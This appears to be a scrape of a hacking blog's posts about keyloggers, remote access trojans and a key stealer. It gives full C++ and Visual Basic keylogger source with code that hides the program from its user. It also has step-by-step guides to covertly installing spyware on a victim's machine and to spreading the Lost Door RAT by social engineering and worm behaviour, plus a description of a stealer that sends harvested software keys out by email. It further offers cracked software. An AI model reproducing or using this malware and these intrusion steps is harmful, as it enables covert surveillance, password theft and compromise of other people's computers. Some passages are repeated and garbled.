F.B.I RAT (Full Backdoor Intergration) V0.1. Supports
xp/Vista/Windows 7, all features have been tested on these OS's
including injection, but there have been some limitations on the
sniffer.
Showing posts with label Keylogger. Show all posts
Showing posts with label Keylogger. Show all posts
Tuesday, December 27, 2011
How to hack keylogger/RAT's password?
Keylogger's and RAT's nowadays are everybody's problem across the internet. Hackers use keyloggers to hack the email passwords
of the victim which they receive in the form of emails or text files on
their respective FTP servers. They spread their keyloggers with the
help of cracks, keygen's or patches of popular software's or simply
through hack tools. So friends, today i will teach you how to reverse engineer the keylogger or RAT to hack the hackers FTP server or email password.
Monday, April 4, 2011
How to install a keylogger on a remote machine?
In my previous article “How To Make A Keylogger” I showed you how to write your own keylogger. Today I will show you how to install a Keylogger on a Remote PC without the knowledge of the owner and you will get all the keystroke information through Email.
Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article.
Now to install a Keylogger on a Remote Computer you have to follow the steps given below:
- First of all download Winspy keylogger software from link given below:
http://www.win-spy.com/
- After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.
- Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
- Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
- Now, Winspy’s main screen will be displayed as shown in image below:
- Select Remote at top, then Remote install.
- On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
User – type in the victim’s name
File name – Name the file to be sent. Use the name such that victim will love to accept it.
File icon – Keep it the same
Picture – select the picture you want to apply to the keylogger.
Email keylog to – Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.
Thats it. This much is enough. If you want, can change other settings also. - After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.
So guys, I hope you have got the trick on how to hack any email account passwords from this article. If you have any comment or views about article, feel free to mention it in comments section.
OR if you need the full version of WinSPY thn you can also contact me or leave a comment.
Thanks...
OR if you need the full version of WinSPY thn you can also contact me or leave a comment.
Thanks...
Saturday, March 26, 2011
How to make a keylogger? (Write keylogger in VB)
Before we start programming, we need to answer a basic question: what is a keylogger?
As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer.
A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.
As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer.
A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.
=========================================
Basic Concepts: What needs to be achieved
=========================================
Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.
Keylogger will:
1 – listen to all the key strokes of the user.
2 – save these keys in a log file.
3 – during logging, does not reveal its presence to the user.
4 – keeps doing its work as long as the used is logged on regardless of users actions.
==========================================
Implementation: Converting logic into code
==========================================
We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!
We need a main form, which will act as HQ to the program.
First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:
Private Sub Form_Load()
Me.Visisble = False
End Sub
This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden.
Figure them out yourself, they have nothing to do with programming.
OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.
There are 3 methods to listen for keys:
* GetAsyncKeyState
* GetKeyboardState
* Windows Hooks
Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState()
So lets use this function, but where is that damn thing and how to use it?
So lets use this function, but where is that damn thing and how to use it?
Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As IntegerThis is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState().
The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.
What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer.
This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer.
Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.
So the two possibilities are:
Do While 1=1
‘our use of the GAKS (GetAsyncKeyState) function LoopandPrivate Sub tmrTimer_Timer()
‘our use of the GAKS function
End Sub
Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed.
And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style
And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style
If GAKS(65)<>0 Then
Msgbox “The ‘A’ key is being pressed”
Else
Msgbox “The ‘A’ key is not being pressed”
End If
Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)<>0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.
Sticking all this stuff together, we can use this code to write a basic functional keylogger:
Private Sub tmrTimer_Timer()
Dim i As Integer
Static data As String
For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’
If GAKS(i)<>0 Then data = data & Chr(i)
Next i
If GAKS(32) <> 0 Then data = data &a ” ” ‘checking for the space bar
If Len(data)>=100 Then
Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data
data = “”
End If
End Sub
This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.
The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it.
We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time.
For this, we need a whole array of counters. So open your eyes and listen attentively.
The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it.
We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time.
For this, we need a whole array of counters. So open your eyes and listen attentively.
Dim count(0 to 255) As IntegerThis array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.
Private Sub tmrTimer_Timer()
Dim i As Integer
Const timelimit As Integer = 10
Static data As String
For i=0 To 255 ‘for all the ASCII codes
If GAKS(i)<>0 Then
If count(i) = 0 Then ‘if the key has just been pressed
data = data & Chr(i)
ElseIf count(i) < timelimit Then
count(i) = count(i) + 1 ‘add 1 to the key count
Else
count(i) = 0 ‘initialize the count
data = data & Chr(i)
End If
Else ‘if the key is not being pressed
count(i) = 0
End If
Next i
End Sub
What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.
Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:
Private Sub timrTimer_Timer()
‘do all the fuss and listen for keystrokes
‘if a key press is detected
Open App.Path & “\logfile.txt” For Append As #1
Print #1, Chr(keycode);
Close #1
End Sub
Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step.
Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.
Thanks,,,
Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.
Thanks,,,
Monday, February 28, 2011
How to control a remote computer with keylogger (Lost Door)?
Remote Administration tools also known as RAT are windows Trojans or in simple terms programs used by a Hacker to get administrative privileges on the victim’s computer. Using a RAT you can do a lot of cool things such as “Upload, delete or modify data” , “Edit registry”, “Capture victim’s screen shot”, “Take control of victim’s Computer”or “Execute a virus” just with a click of a button.
Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim’s computer remotely.
Disclaimer: Coder and related sites are not responsible for any abuse done using this software.
Follow the steps below to setup a server for Lost Door.
- Download Lost Door from here . (The password to unzip this file is “qq” without double quotes.)
- On executing the download file, you will see the following screen. Accept it
- After it is open, right click on the window and click on create server
- Now enter your IP address and DNS here. Leave the rest of the field as it is.
- Now click on the ‘Options’ tab and choose the options as you want. To activate an offline keylogger is a good practice.
- Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim.
- Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim.
Sending the server file to your victim
This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.
- If you have physical access to the victim’s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.
- For those who don’t have physical access can use social engineering in order to get the victim execute that file on his computer.
Using Spreading to affect multiple victims
If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.
Thanks...
Monday, November 15, 2010
How to make/write a kernel keylogger?
Hi friends, did u need a keylogger?
If YES, why not write your own keylogger...
Here i provide a tutorial so that you can make your own keylogger as you wish..
This article is divided into two parts. The first part of the paper givesan overview on how the linux keyboard driver work, and discusses methodsthat can be used to create a kernel based keylogger. This part
willbe useful for those who want to write a kernel based keylogger, or to writetheir own keyboard driver (for supporting input of non-supported languagein linux environment, ...) or to program taking advantage of many featuresin the Linux keyboard driver.
The second part presents detail of vlogger, asmart kernel based linux keylogger,and how to use it. Keylogger is a veryinteresting code being usedwidely in honeypots, hacked systems, ... by white and black hats. As mostof us known, besides user space keyloggers (such as iob, uberkey, unixkeylogger,...), there are some kernel based keyloggers. The earliest
kernelbased keylogger is linspy of halflife which was published in Phrack 50. The common method of those kernel basedkeyloggers using is to log userkeystrokes by intercepting sys_read or sys_write system call.
However,this approach is quite unstable and slowing down the whole system noticeablybecause sys_read (or sys_write) is the generic read/write functionof the system; sys_read is called whenever a process wants to read somethingfrom devices (such as keyboard, file, serial port, ...). In vlogger,I used a better way to implement it that hijacks the tty buffer processingfunction.
The reader is supposed to possess theknowledge on Linux Loadable Kernel Module.
Here i'm unable to write the full tutorial, so i upload it n provide u a DOWNLOAD LINK
Thanks...
Sunday, November 7, 2010
How to secure your self from Keylogger (Detect n fool Keylogger)?
You might have heard about a dangerous application called Keylogger.Its a very tricky tool to record your key strokes in a notepad file. Wheneveryou type anything using keyboard, this software stores all your key strokes. Ifyou access Internet from any cyber cafe or any public PC, this post is must foryou.
There are many keyloggers that are not detected by anti virus and othersecurity applications, so today I am sharing few tricks with which you can foolkeyloggers easily.
1) Use Virtual Keyboard : Whenever you access PC from anycyber cafe always use Virtual Keyboard or On ScreenKeyboard for entering password.
How to enable virtual keyboard : If you are using WindowsXP, Click on Start >> All Programs >> Accessories <<Accessibility >> On Screen Keyboard. Have a look :
2) Anti Keylogger : If you do not know whether keylogger isinstalled or not, you can use this software called Elite Anti Keylogger.It has more than 1000 known keyloggers and will warn you immmeditely it detectsany keylogger. Click here to download.
3) Norton Internet Security 2011 : You can also use Anti Virus software to protect your self from Keylogger.
Norton Internet Security 2011 is good bcz it can protect you from Internet viruses as well as internel (your system) viruses. It available as 3 month free subscription or 9 month free subscription
If you want to use it as 1 year free subscription thn mail me n i'll snd u the trick of it
Thanks.
Tuesday, September 7, 2010
Best tools for hack a remote pc or website
Below is the 10th favorite hacker toolsthat gets the most votes throughout the year 2006. Tool is a weapon thatis considered absolutely necessary in hacking and security activities.
1. Nessus
“Nessus” was first made by Renaud Deraison in 1998 and deployed to theInternet community a free, useful, including a well updated and easy touse. Nessus is a program to find a weakness in a computersystem. According to the official website at www.nessus.org, this toolhas been used by more than 75,000 organizations and companies around the world.
2. Snort
Snort is an IDS, which is a tool to prevent and detect attacks oncomputer systems. Vendors from Snort claim that this tool has beendownloaded millions of times from their site.
3. Kismet
Kismet is a tool to detect wireless connection (traffic supports802.11b, 802.11a, and 802.11g), capture packets in a network system andbecome an IDS (intrusion detection system). To find out more aboutkismet, you can visit the site http://www.kismetwireless.net or go toirc.freenode.net # kismet.
4. Metasploit Framework
Metasploit Framework is an open source project for developing, testingand using exploit code.Created with Perl language as the foundation andconsists of basic and supplementary components that have been compiledwith the C language, assembler, and Python. Metasploit Framework canrun on UNIX operating systems, Linux and Windows. A more detaileddescription can you find in http://www.metasploit.com.
5. Netcat
Netcat is a networking tool utility that can read and write data on anetwork connection via TCP / IP protocol. Features found on Netcatinclude:
- Outgoing and incoming connections via UDP or TCP protocol to port
- Tunneling mode,tunneling from UDP to TCP, to map the network parameters (source port /interface, listening port / interface, and allows remote hosts toconnect to the tunnel)
- Port scanners, to detect an open port.
- Buffered send-mode and hexdump RFC854 telnet.
Hping is a versatile tool. This toolcan be used to test the ability of a firewall, look for open ports,network security testing using various protocols, operating systeminformation, evaluates the TCP / IP.
7. TCP Dump
Tcpdump is also a sniffer. Network administrators use this tool tomonitor traffic and analyze the problem if an interruptionoccurs. According to information in http://www.iepm.slac.stanford.edu/monitoring/passive/tcpdump.html,tcpdump uses the packet filter from BSD UNIX to capture data (BPF / BSDPacket Filter). BPF received a copy of the drivertcpdump paket. Penggunasender and receiver can also filter packets in accordance with thedesire.
8. John the Ripper
A password cracker from hackers era ancestor who was a top 10 favoritetools. Here is a description of the author John The Ripper. ”John theRipper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak Unix passwords. Ithas been tested with x86/Alpha/SPARC Linux, FreeBSD x86, OpenBSD x86,Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX. “
A password cracker from hackers era ancestor who was a top 10 favoritetools. Here is a description of the author John The Ripper. ”John theRipper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak Unix passwords. Ithas been tested with x86/Alpha/SPARC Linux, FreeBSD x86, OpenBSD x86,Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX. “
9. Cain and Abel
Cain & Abel is a tool for password problems. This tool can collectpasswords by sniffing the network method, cracking passwords usingDictionary attacks, Brute-Force and Cryptanalysis attacks, recordingVoIP conversations (Voice Over Internet Protocol), cracking a wirelessnetwork, analyze traffic in the network. www.oxid.it
10. Wireshark / Ethereal
Wireshark / Ethereal is a tool to analyze network protocols. Alsofunctions as a sniffer. Monitor Internet traffic. Wireshark can run onWindows, MAC OS X, and Linux. www.wireshark.org
THANKS
Wireshark / Ethereal is a tool to analyze network protocols. Alsofunctions as a sniffer. Monitor Internet traffic. Wireshark can run onWindows, MAC OS X, and Linux. www.wireshark.org
IF YOU ANY TOOLS FROM THAT LIST, THN MAIL ME OR LEAVE A COMMENT.
OR
HELP/TIPS/TUTORIAL "HOW TO USE", THN ALSO LEAVE A COMMENT OR MAIL ME THANKS
Thursday, August 19, 2010
LINUX : Keylogger for LINUX
Hey guys, recently I found a keylogger for LINUX and UBUNTU, it works better that Windows keylogger due to its OpenSource :)
Check it out...
First of all, i'll explain (give a brief def. of Keylogger) something about Keylogger :-
What is Keylogger?
Keystroke logger is the practice of noting (or logging) thekeys struck on a keyboard, typically in a covert manner so that the personusing the keyboard is unaware that their actions are being monitored. There arenumerous keylogging methods, ranging from hardware- and software-based toelectromagnetic and acoustic analysis.keylogger in Linux
We have an opensource software available for Linux called lkl (Linux KeyLogger).LKL is a userspace keylogger that runs under linux–x86/arch. LKL sniffs andlogs everything passes trought the hardware keyboard port (0×60).
Download key logger here
How to Install?
Step 1
Unzip or untar the file you have downloadedStep 2
Change in to directory by typing cd lklStep 3
Give the below command./confiureThis will check all the required resurces it needs
Step 4
Type `make‘ to compile the package.Step 5
Optionally, type `make check’ to run anyself-tests that come with the package.Step 6
Type `sudo make install‘ to install theprogramsNow you are done with the installation
How to use?
You can send argument with the command lkl-h helpExample: lkl -l -k us_km -o log.file // use USA kb and put logs in‘log.file’
-l start to log the 0×60 port (keyboard)
-b debug mode
-k set a keymap file
-o set an output file
-m send logs to
-t hostname for sendmail. Default is localhost
Please comment on the same if it doesn’t works for you
Thursday, June 24, 2010
Make your own Keylogger
Wanna learn how to make your own keylogger ?
Here is step by step tuorial that will help you to make a keylogger in C++ using dev-c++, it can also be done in codegear c++ builder, Visual studio and similar.
Keylogger is simple stealth software that sits between keyboard hardware and the operating system, so that it can record every key stroke
How to install DevC++ and run .cpp file
2)Launch Dev C++ , Click on File-> New-> Project
3) Choose empty project, type name of project for example MyKeylogger and select C++ Project
4) Right click on project name and click New File,

after this will appear field where you should type code , to execute code click on Execute->Compile & Run or press F9
How To Make A Keylogger in Dev C++
Open Keylogger.cpp and Write this in it.
Make a main function .(The main function will be the first that will be executed.)#include // These we need to
using namespace std; // include to get our
#include // Keylogger working.
#include
int Save (int key_stroke, char *file);
void Stealth(); //Declare Stealth.
Under that we will write our keylogger so it will also recognize special keys like the ’spacebar’ and stuff.int main()
{
Stealth(); // This will call the stealth function we will write later.
char i; //Here we declare 'i' from the type 'char'while (1) // Here we say 'while (1)' execute the code. But 1 is always 1 so it will always execute.
{ // Note this is also the part that will increase your cpu usage
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt"); // This will send the value of 'i' and "LOG.txt" to our save function we will write later. (The reason why we declared it at the start of the program is because else the main function is above the save function so he wont recognize the save function. Same as with the stealth function.)
}
}
system ("PAUSE"); // Here we say that the system have to wait before exiting.
return 0;
}
If you want to add some yourself here is a site where you can look up the ascii table. http://www.asciitable.com/
int Save (int key_stroke, char *file) // Here we define our save function that we declared before.
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");cout << key_stroke << endl;if (key_stroke == 8) // The numbers stands for the ascii value of a character
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); // This will print [BACKSPACE] when key 8 is pressed. All the code under this works the same.
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n"); // This will make a newline when the enter key is pressed.
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB) //VK stands for virtual key wich are the keys like Up arrow, down arrow..
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);fclose (OUTPUT_FILE);
return 0;
}
Now we going to add Stealth to it.
Under the latest code add again
So thats it, you wrote your first keyloggervoid Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
Full Code:
#includeIf you do not like programming below you can download one of the best keyloggers called EuroCron Spy
using namespace std;
#include
#includeint Save (int key_stroke, char *file);
void Stealth();int main()
{
Stealth();
char i;while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}/* *********************************** */int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");cout << key_stroke << endl;if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);fclose (OUTPUT_FILE);
return 0;
}/* *********************************** */void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
Monday, June 14, 2010
Tutorial : Crystal Stealer
Guys, finally, here it is: the Crystal Stealer.
Crystal stealer is a serial and CD key stealer for numerous applications and games.
Code:
Applications supported:Code:
@Stake L0pht CrackLC5
3D Mark 2001 Name
3D Mark 2001 Key
Acronis True Image
Adobe Acrobat 6
Adobe Acrobat 7
Adobe Acrobat 8.x
Adobe Photoshop 7
Advanced Direct Remailer (ADR =>2.20)
Advanced Direct Remailer (ADR <=2.18)
After Effects 7 Name
After Effects 7 Company
After Effects 7 Serial
Alcohol 120% 1.9.x Name
Alcohol 120% 1.9.x Key
Anno 1701
Axailis IconWorkshop 6.0
Battlefield 1942
Battlefield 1942 Road To Rome
Battlefield 1942 Secret Weapons of WWII
Battlefield Vietnam
Beyond TV 4
Beyond TV 4 Link
Beyond Media
BitComet Acceleration Patch
Black and White
Borland Delphi 6 Serial
Borland Delphi 6 Key
Borland Delphi 7 Serial
Borland Delphi 7 Key
Call of Duty 2
Call of Duty 1
Call of Duty 4
Call of Duty WAW
Chrome
Command and Conquer: Generals Zero Hour
Command and Conquer: Tiberian Sun
Command and Conquer: Red Alert
Command and Conquer: Red Alert 2
Command and Conquer: Red Alert 2 Yuri\'s Revenge
Command and Conquer 3: Tiberium Wars
Company of Heroes Version
Company of Heroes Key
Counter-Strike (Retail)
Crysis
Cyberlink PowerDVD Version
Cyberlink PowerDVD Key
Dell Service Tag
DVD Profiler First Name
DVD Profiler Last Name
DVD Profiler Key
Elaborate Bytes Clone DVD
FIFA 2002
FIFA 2003
Freedom Force
Futuremark 3DMark2001 Name
Futuremark 3DMark2001 Key
Futuremark 3DMark2003
Futuremark 3DMark2005
Futuremark 3DMark2006
Futuremark PCMark2005
GetDataBack Name
GetDataBack Key
GetDataBack for NTFS Name
GetDataBack for NTFS Key
GetRight/Pro
GetRight/Pro Version
GetRight Key
Global Operations
Gunman Chronicles
Half-Life
HDD State Inspector
Hidden & Dangerous 2
IGI 2: Covert Strike
Industry Giant 2
James Bond 007 Nightfire
Legends of Might and Magic Customer Number
LimeWire Acceleration Patch
mIRC Username
mIRC Key
Medal of Honor: Allied Assault
Medal of Honor: Allied Assault: Breakth
Medal of Honor: Allied Assault: Spearhe
Nascar Racing 2002
Nascar Racing 2003
Naturally Speaking 8
Need For Speed Hot Pursuit
Nero Burning Rom Name
Nero Burning Rom Company
Nero Burning Rom 5 Serial
Nero Burning Rom 6 Serial
Nero Burning Rom 7 Name
Nero Burning Rom 7 Company
Nero Burning Rom Version
Nero Burning Rom Serial
NewsBin Pro 5x First Name
NewsBin Pro 5x Last Name
NewsBin Pro 5x Key
NHL 2002
NHL 2003
Norton Antivirus 2006
Norton PartitionMagic 8.x Name
Norton PartitionMagic 8.x Company
Norton PartitionMagix 8.x Serial
NOX
O&O BlueCon 5 Name
O&O BlueCon 5 Company
O&O BlueCon 5 Serial
O&O CleverCache 6 Name
O&O CleverCache 6 Company
O&O CleverCache 6 Serial
O&O Defrag 8 Name
O&O Defrag 8 Company
O&O Defrag 8 Serial
O&O DiskImage 1 Name
O&O DiskImage 1 Company
O&O DiskImage 1 Serial
O&O DiskRecovery 3 Name
O&O DiskRecovery 3 Company
O&O DiskRecovery 3 Serial
O&O DriveLED 2 Name
O&O DriveLED 2 Company
O&O DriveLED 2 Serial
O&O SafeUnErase 2 Name
O&O SafeUnErase 2 Company
O&O SafeUnErase 2 Serial
O&O SafeErase 2 Name
O&O SafeErase 2 Company
O&O SafeErase 2 Serial
Padus DiscJuggler Name
Padus DiscJuggler Serial
PC Icon Editor Name
PC Icon Editor Serial
PowerQuest PartitionMagic
Pro Evolution Soccer 6
Quake 4
Ravenshield
ReplayConverter
Registy Mechanic Name
Registy Mechanic Serial
Roxio My DVD 8 Premier
SecurDataStor v6 Key (Machine)
SecurDataStor v6 Key (User)
SecurDataStor v6 CD-Media Key (Machine)
SecurDataStor v6 CD-Media Key (User)
Shogun: Total War: Warlord Edition
Sims, The
Sims, The Living Large
Sims, The House Party
Sims, The 2 Family Fun Stuff
Sims, The 2 Glamour Life Stuff
Sims, The 2 Nightlife
Sims, The 2 Open for Business
Sims, The 2 Pets
Sims, The 2 Seasons
Sims, The 2 University
SimCity 4 Deluxe
Slysoft AnyDVD
Slysoft CloneCD
Smartversion
Soldiers Of Anarchy
Sonic Record Now!
Sony Vegas 6
Splinter Cell - Chaos Theory
Stardock Serial
SuperCleaner Name
SuperCleaner Serial
Symantec Norton Internet Security 2007
Tag&Rename Name
Tag&Rename Serial
Techsmith Camtasia Studio 3.0 Name
Techsmith Camtasia Studio 3.0 Key
Techsmith Camtasia Studio 4.0
Techsmith SnagIt 8.0 Name
Techsmith SnagIt 8.0 Key
The Gladiators
TGTSoft StyleXP
TMPGEnc Plus 2.5 Name
TMPGEnc Plus 2.5 Company
TMPGEnc Plus 2.5 Serial
Trend Micro PC-cillin Antivirus 11
Trend Micro PC-cillin Antivirus 2007
TuneUP 2006 Name
TuneUP 2006 Company
TuneUP 2006 Key
TuneUP 2007 Name
TuneUP 2007 Company
TuneUP 2007 Key
Unreal Tournament 2003
Unreal Tournament 2004
VMware Server Serial
VMware Workstation 5.0
VSO ConvertX to DVD Version
VSO ConvertX to DVD Key (Machine)
VSO ConvertX to DVD Key (User)
VSO ConvertXtoDVD Version
VSO ConvertXtoDVD Key
Westwood Alarmstufe Rot 2
Westwood Alarmstufe Rot 2 Yuri\'s Revenge
Westwood Tiberian Sun
Winamp 5 Name
Winamp 5 Serial
WinImage Name
WinImage Key
WinPatrol
WS FTP
ZoneAlarm Name
ZoneAlarm Company
ZoneAlarm Serial
How this stealer works
-The stealer downloads a file with keys from it's main server with pure winsock api and the HTTP protocol. (so the registry keys are NOT hardcoded and can be updated without updating the .exe)-Then it parses all keys and reads them in the registry.
-Then logs in onto the GMAIL smtp server and sends you an email with the stolen keys.
Additional Information
This stealer is FREE and I will update it for free.If you want more applications to be on the list, I will add them immediately if you give me the registry path of the app. I will update the keyfile and all stealers are automatically updated.
Usage :
